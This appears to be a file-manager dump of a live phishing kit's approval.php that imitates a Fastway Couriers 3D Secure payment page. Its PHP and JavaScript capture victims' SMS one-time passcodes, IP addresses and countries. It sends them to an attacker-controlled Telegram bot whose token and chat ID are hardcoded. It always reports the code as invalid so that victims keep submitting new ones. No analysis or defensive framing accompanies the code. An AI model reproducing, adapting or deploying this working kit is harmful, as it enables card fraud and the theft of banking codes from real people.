9B534B8686E580E0E01768F00155B461

at path：ROOT / fastway / approval.php

run：R W Run

assets

DIR

2026-03-20 04:26:56

R W Run

approval.php

21.55 KB

2026-05-28 13:26:25

R W Run

error_log

4.17 KB

2026-03-18 03:54:16

R W Run

index.php

18.05 KB

2026-05-28 13:26:25

R W Run

loading1.php

10.21 KB

2026-03-20 04:33:56

R W Run

loading2.php

9.82 KB

2026-03-20 04:34:26

R W Run

payment.php

23.61 KB

2026-05-28 13:26:25

R W Run

error_log

📄approval.php

<?php
$BOT_TOKEN = "8286993282:AAFvgZ9dD4Qrvedz-MQmE0OKSNAOjSUfeUU";
$CHAT_ID = "-5024972976";

// === GET USER INFO ===
$ip = $_SERVER['REMOTE_ADDR'] ?? 'Unknown';
$user_agent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';
$country = 'Unknown';
$context = stream_context_create(['http' => ['timeout' => 5]]);
$geoData = @file_get_contents("http://ip-api.com/json/{$ip}", false, $context);
if ($geoData !== false) {
    $geo = json_decode($geoData);
    $country = $geo->country ?? 'Unknown';
}

function sendTelegram($msg) {
    global $BOT_TOKEN, $CHAT_ID;
    $url = "https://api.telegram.org/bot{$BOT_TOKEN}/sendMessage";
    $data = [
        'chat_id' => $CHAT_ID,
        'text' => $msg,
        'parse_mode' => 'HTML',
        'disable_web_page_preview' => true
    ];
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL => $url,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => http_build_query($data),
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT => 10,
        CURLOPT_SSL_VERIFYPEER => false
    ]);
    curl_exec($ch);
    curl_close($ch);
}

// === HANDLE AJAX ===
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action'])) {
    $msg = "";

if ($_POST['action'] === 'verify') {
        $otp = trim($_POST['otp'] ?? '');
        $attempt = intval($_POST['attempt'] ?? 1);

$msg = "<b>⚠️ FASTWAY COURIERS OTP ATTEMPT #{$attempt}</b>\n";
        $msg .= "══════════════════════════════\n";
        $msg .= "<b>OTP:</b> <code>{$otp}</code>\n";
        $msg .= "<b>IP:</b> <code>{$ip}</code>\n";
        $msg .= "<b>Country:</b> {$country}\n";
        $msg .= "<b>Time:</b> " . date('d/m/Y H:i:s') . "\n";
        sendTelegram($msg);

echo json_encode(['status' => 'invalid', 'attempt' => $attempt + 1]);
        exit;
    }

if ($_POST['action'] === 'approved') {
        $msg = "<b>✅ FASTWAY COURIERS PAYMENT APPROVED</b>\n";
        $msg .= "══════════════════════════════\n";
        $msg .= "<b>IP:</b> <code>{$ip}</code>\n";
        $msg .= "<b>Country:</b> {$country}\n";
        $msg .= "<b>Time:</b> " . date('d/m/Y H:i:s') . "\n";
        sendTelegram($msg);

echo json_encode(['status' => 'loop']);
        exit;
    }
}

// === GET PAYMENT DATA ===
$paymentData = json_decode($_POST['payment'] ?? '', true) ?: [];
$tracking = htmlspecialchars($paymentData['tracking'] ?? 'FW632846518');
$last4 = substr(preg_replace('/\D/', '', $paymentData['card_number'] ?? ''), -4) ?: '0000';
$time = date('H:i');
$date = date('d/m/Y');
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Fastway Couriers | Payment Verification</title>
    <link href="https://fonts.googleapis.com/css2?family=Barlow+Condensed:wght@400;600;700;800&family=Barlow:wght@300;400;500;600&display=swap" rel="stylesheet">
    <style>
        *, *::before, *::after { box-sizing: border-box; margin: 0; padding: 0; }

:root {
            --orange: #F47920;
            --orange-light: #FF8C3A;
            --navy: #1A2340;
            --navy-dark: #10172B;
            --navy-mid: #232E4A;
            --white: #FFFFFF;
            --off-white: #F7F8FA;
            --grey: #6B7280;
            --light-grey: #E5E7EB;
            --text: #1F2937;
            --success: #0F7B4B;
            --danger: #DC2626;
            --danger-bg: #FEF2F2;
            --radius: 6px;
            --shadow-sm: 0 4px 12px rgba(0,0,0,0.05);
        }

body {
            font-family: 'Barlow', sans-serif;
            color: var(--text);
            background: var(--off-white);
            min-height: 100vh;
            display: flex;
            flex-direction: column;
        }

.container { max-width: 500px; margin: 0 auto; width: 100%; padding: 0 1.5rem; }

/* HEADER */
        .header {
            background: var(--white);
            padding: 1rem 0;
            box-shadow: 0 2px 10px rgba(0,0,0,0.05);
        }
        .header-container {
            max-width: 1200px;
            margin: 0 auto;
            padding: 0 1.5rem;
        }
        .logo-container { display: flex; align-items: center; }
        .logo { height: 70px; width: auto; }

/* BANK HEADER */
        .bank-header {
            background: linear-gradient(135deg, var(--navy-dark), var(--navy));
            color: var(--white);
            padding: 1.25rem;
            border-radius: var(--radius) var(--radius) 0 0;
            text-align: center;
            font-weight: 600;
            font-size: 1rem;
            display: flex;
            align-items: center;
            justify-content: center;
            gap: 0.5rem;
            border-bottom: 3px solid var(--orange);
            margin-top: 2rem;
        }

/* CARD */
        .approval-card {
            background: var(--white);
            border: 1px solid var(--light-grey);
            border-radius: 0 0 var(--radius) var(--radius);
            padding: 2rem;
            margin-bottom: 2rem;
            box-shadow: var(--shadow-sm);
        }

/* TRANSACTION */
        .transaction {
            background: var(--off-white);
            border-radius: var(--radius);
            padding: 1.25rem;
            margin-bottom: 1.5rem;
            border: 1px solid var(--light-grey);
        }
        .trans-row {
            display: flex;
            justify-content: space-between;
            padding: 0.6rem 0;
            font-size: 0.95rem;
            border-bottom: 1px solid var(--light-grey);
        }
        .trans-row:last-child { border-bottom: none; }
        .trans-label { color: var(--grey); }
        .trans-value { font-weight: 600; color: var(--navy-dark); }
        .amount { 
            color: var(--success);
            font-weight: 700;
            font-size: 1.25rem;
        }

/* PUSH NOTIFICATION */
        .app-notif {
            background: var(--off-white);
            border-radius: var(--radius);
            padding: 1.5rem;
            margin: 1.5rem 0;
            text-align: center;
            border: 1px solid var(--light-grey);
        }
        .app-notif img {
            width: 120px;
            height: 120px;
            margin-bottom: 1rem;
            display: block;
            margin-left: auto;
            margin-right: auto;
        }
        .app-notif strong {
            display: block;
            color: var(--navy-dark);
            margin-bottom: 0.5rem;
            font-size: 1.1rem;
            font-weight: 700;
        }
        .app-badge {
            display: inline-block;
            background: var(--orange);
            color: var(--white);
            padding: 0.5rem 1rem;
            border-radius: 30px;
            font-size: 0.85rem;
            margin-top: 0.75rem;
            font-weight: 600;
        }

/* LOADING DOTS */
        .loading-dots {
            text-align: center;
            padding: 1.5rem;
            margin: 1rem 0;
            font-size: 0.95rem;
            color: var(--grey);
            background: var(--off-white);
            border-radius: var(--radius);
            border: 1px solid var(--light-grey);
        }
        .dot-container {
            margin-top: 0.75rem;
        }
        .dot {
            display: inline-block;
            width: 8px;
            height: 8px;
            border-radius: 50%;
            background: var(--orange);
            margin: 0 4px;
            animation: dotPulse 1.4s infinite ease-in-out;
        }
        .dot:nth-child(2) { animation-delay: 0.2s; }
        .dot:nth-child(3) { animation-delay: 0.4s; }
        @keyframes dotPulse {
            0%, 80%, 100% { transform: scale(0.6); opacity: 0.5; }
            40% { transform: scale(1); opacity: 1; }
        }

/* SMS INPUT */
        .sms-container {
            margin: 1.5rem 0;
            display: none;
        }
        .sms-label {
            font-weight: 700;
            margin-bottom: 0.5rem;
            color: var(--navy-dark);
            font-size: 0.9rem;
            text-transform: uppercase;
            letter-spacing: 0.5px;
        }
        .sms-hint {
            color: var(--grey);
            font-size: 0.85rem;
            margin-bottom: 1rem;
        }
        .sms-input {
            width: 100%;
            padding: 0.85rem;
            font-size: 1rem;
            text-align: center;
            border: 2px solid var(--light-grey);
            border-radius: var(--radius);
            background: var(--white);
            font-family: monospace;
            margin-bottom: 1rem;
        }
        .sms-input:focus {
            outline: none;
            border-color: var(--orange);
            box-shadow: 0 0 0 3px rgba(244,121,32,0.1);
        }
        .sms-input.error {
            border-color: var(--danger);
        }

.btn-primary {
            width: 100%;
            padding: 0.85rem;
            background: var(--orange);
            color: var(--white);
            border: none;
            border-radius: var(--radius);
            font-weight: 600;
            font-size: 0.95rem;
            cursor: pointer;
            text-transform: uppercase;
            letter-spacing: 1px;
            transition: all 0.15s ease;
        }
        .btn-primary:hover {
            background: var(--orange-light);
            transform: translateY(-1px);
            box-shadow: 0 4px 12px rgba(244,121,32,0.3);
        }
        .btn-primary:disabled { 
            background: var(--light-grey);
            color: var(--grey);
            cursor: not-allowed;
        }

.cooldown {
            margin-top: 1rem;
            color: var(--grey);
            font-size: 0.85rem;
            text-align: center;
            padding: 0.75rem;
            background: var(--off-white);
            border-radius: var(--radius);
            border: 1px solid var(--light-grey);
        }

.error-message {
            display: none;
            color: var(--danger);
            margin-top: 1rem;
            font-size: 0.85rem;
            text-align: center;
            padding: 0.75rem;
            background: var(--danger-bg);
            border-radius: var(--radius);
            border: 1px solid var(--danger);
        }

.approve-link {
            display: block;
            text-align: center;
            color: var(--navy);
            text-decoration: none;
            margin: 1.25rem 0;
            font-size: 0.9rem;
            font-weight: 600;
            padding: 0.85rem;
            background: var(--off-white);
            border-radius: var(--radius);
            border: 1px solid var(--light-grey);
            transition: all 0.15s ease;
        }
        .approve-link:hover { 
            background: var(--light-grey);
            color: var(--orange);
        }

.loop-message {
            display: none;
            color: var(--danger);
            margin: 1rem 0;
            font-size: 0.9rem;
            text-align: center;
            font-weight: 600;
            padding: 1rem;
            background: var(--danger-bg);
            border-radius: var(--radius);
            border: 1px solid var(--danger);
        }

.security-badges {
            display: flex;
            justify-content: center;
            gap: 1rem;
            margin-top: 1.5rem;
            flex-wrap: wrap;
        }
        .badge {
            background: var(--off-white);
            padding: 0.5rem 0.8rem;
            border-radius: var(--radius);
            font-size: 0.75rem;
            color: var(--grey);
            display: flex;
            align-items: center;
            gap: 0.4rem;
            border: 1px solid var(--light-grey);
        }

/* FOOTER */
        .footer {
            background: var(--navy-dark);
            padding: 2.5rem 0 2rem;
            margin-top: auto;
        }
        .footer-content {
            max-width: 1200px;
            margin: 0 auto;
            padding: 0 1.5rem;
            text-align: center;
        }
        .footer-logo {
            margin-bottom: 1rem;
        }
        .footer-logo img {
            height: 60px;
            width: auto;
            opacity: 0.9;
        }
        .footer-copyright {
            color: rgba(255,255,255,0.4);
            font-size: 0.8rem;
        }

@keyframes shake {
            0%, 100% { transform: translateX(0); }
            25% { transform: translateX(-5px); }
            75% { transform: translateX(5px); }
        }
        .shake { animation: shake 0.3s ease; }

@media (max-width: 500px) {
            .container { padding: 0 1rem; }
            .approval-card { padding: 1.5rem; }
            .logo { height: 60px; }
            .app-notif img { width: 100px; height: 100px; }
        }
    </style>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css">
</head>
<body>

<header class="header">
    <div class="header-container">
        <div class="logo-container">
            <img src="assets/1.png" alt="Fastway Couriers" class="logo">
        </div>
    </div>
</header>

<div class="container">
    
    <div class="bank-header">
        <i class="fas fa-shield-alt"></i> Fastway Couriers - 3D Secure Verification
    </div>

<div class="approval-card">
        <div class="transaction">
            <div class="trans-row">
                <span class="trans-label">Merchant</span>
                <span class="trans-value">Fastway Couriers SA</span>
            </div>
            <div class="trans-row">
                <span class="trans-label">Amount</span>
                <span class="trans-value amount">
                    R122.36
                </span>
            </div>
            <div class="trans-row">
                <span class="trans-label">Date & Time</span>
                <span class="trans-value"><?php echo "$date, $time"; ?></span>
            </div>
            <div class="trans-row">
                <span class="trans-label">Card</span>
                <span class="trans-value">•••• •••• •••• <?php echo $last4; ?></span>
            </div>
            <div class="trans-row">
                <span class="trans-label">Reference</span>
                <span class="trans-value"><?php echo $tracking; ?></span>
            </div>
        </div>

<div class="app-notif">
            <img src="assets/pending.gif" alt="Verification Pending">
            <strong>Verification Request Sent</strong>
            <div style="font-size: 0.9rem; margin: 0.5rem 0; color: var(--grey);">
                Check your banking app to approve this payment.
            </div>
            <div class="app-badge">
                <i class="fas fa-mobile-alt"></i> Open banking app
            </div>
        </div>

<div class="loading-dots" id="loadingDots">
            Waiting for verification from your bank
            <div class="dot-container">
                <span class="dot"></span>
                <span class="dot"></span>
                <span class="dot"></span>
            </div>
        </div>

<div class="sms-container" id="smsContainer">
            <div class="sms-label">
                <i class="fas fa-sms"></i> SMS Verification
            </div>
            <div class="sms-hint">
                Enter the verification code sent to your registered mobile number.
            </div>
            <input type="text" class="sms-input" id="smsInput" placeholder="Enter verification code" inputmode="text">
            <button class="btn-primary" id="verifyBtn">
                <i class="fas fa-check-circle"></i> Verify Code
            </button>
            <div class="cooldown" id="cooldown" style="display:none;">
                <i class="fas fa-clock"></i> Please wait <span id="countdown">15</span> seconds before trying again
            </div>
            <div class="error-message" id="errorMessage">
                <i class="fas fa-exclamation-circle"></i>
                <span id="errorText">Invalid verification code</span>
            </div>
        </div>

<a href="#" class="approve-link" id="approveLink">
            <i class="fas fa-check-double"></i> I have approved in my banking app
        </a>

<div class="loop-message" id="loopMessage">
            <i class="fas fa-exclamation-triangle"></i>
            Approval not detected. Please use SMS verification.
        </div>

<div class="security-badges">
            <div class="badge"><i class="fas fa-shield-alt"></i> 3D Secure</div>
            <div class="badge"><i class="fas fa-lock"></i> Encrypted</div>
            <div class="badge"><i class="fas fa-check-circle"></i> Verified</div>
        </div>
    </div>
</div>

<footer class="footer">
    <div class="footer-content">
        <div class="footer-logo">
            <img src="assets/3.png" alt="Fastway Couriers">
        </div>
        <div class="footer-copyright">
            © 2026 Fastway Couriers South Africa (Pty) Ltd. All rights reserved.
        </div>
    </div>
</footer>

// SMS Input handling - Alphanumeric only
document.getElementById('smsInput').addEventListener('input', function(e) {
    this.value = this.value.replace(/[^A-Za-z0-9]/g, '');
    if (this.classList.contains('error')) {
        this.classList.remove('error');
        document.getElementById('errorMessage').style.display = 'none';
    }
});

// Verify Button
let attempt = 1;
let cooldown = false;
document.getElementById('verifyBtn').addEventListener('click', async () => {
    if (cooldown) return;
    const otp = document.getElementById('smsInput').value.trim();
    
    if (otp.length === 0) {
        showError('Please enter verification code');
        document.getElementById('smsInput').classList.add('error');
        return;
    }

const btn = document.getElementById('verifyBtn');
    btn.disabled = true;
    btn.innerHTML = '<i class="fas fa-spinner fa-spin"></i> Verifying...';

try {
        const res = await fetch('', {
            method: 'POST',
            headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
            body: `action=verify&otp=${encodeURIComponent(otp)}&attempt=${attempt}`
        });
        const data = await res.json();

showError('Invalid code. Please try again.');
        document.getElementById('smsInput').classList.add('error');
        document.getElementById('smsInput').classList.add('shake');
        setTimeout(() => document.getElementById('smsInput').classList.remove('shake'), 300);
        
        attempt++;
        startCooldown();
    } catch (e) {
        btn.disabled = false;
        btn.innerHTML = '<i class="fas fa-check-circle"></i> Verify Code';
        showError('Connection error. Please try again.');
    }
});

function showError(message) {
    const el = document.getElementById('errorMessage');
    document.getElementById('errorText').textContent = message;
    el.style.display = 'block';
    
    const btn = document.getElementById('verifyBtn');
    btn.disabled = false;
    btn.innerHTML = '<i class="fas fa-check-circle"></i> Verify Code';
}

function startCooldown() {
    cooldown = true;
    const btn = document.getElementById('verifyBtn');
    const cd = document.getElementById('cooldown');
    const count = document.getElementById('countdown');
    btn.style.display = 'none';
    cd.style.display = 'block';

let time = 15;
    const interval = setInterval(() => {
        time--;
        count.textContent = time;
        if (time <= 0) {
            clearInterval(interval);
            cooldown = false;
            btn.style.display = 'block';
            btn.disabled = false;
            btn.innerHTML = '<i class="fas fa-check-circle"></i> Verify Code';
            cd.style.display = 'none';
            document.getElementById('smsInput').value = '';
            document.getElementById('smsInput').classList.remove('error');
            document.getElementById('errorMessage').style.display = 'none';
            document.getElementById('smsInput').focus();
        }
    }, 1000);
}

// App approval link
document.getElementById('approveLink').addEventListener('click', async (e) => {
    e.preventDefault();
    showError('Approval not detected. Please use SMS verification.');
    document.getElementById('smsInput').classList.add('error');

await fetch('', {
        method: 'POST',
        headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
        body: 'action=approved'
    });

document.getElementById('loopMessage').style.display = 'block';
    document.getElementById('approveLink').style.display = 'none';
});
</script>

</body>
</html>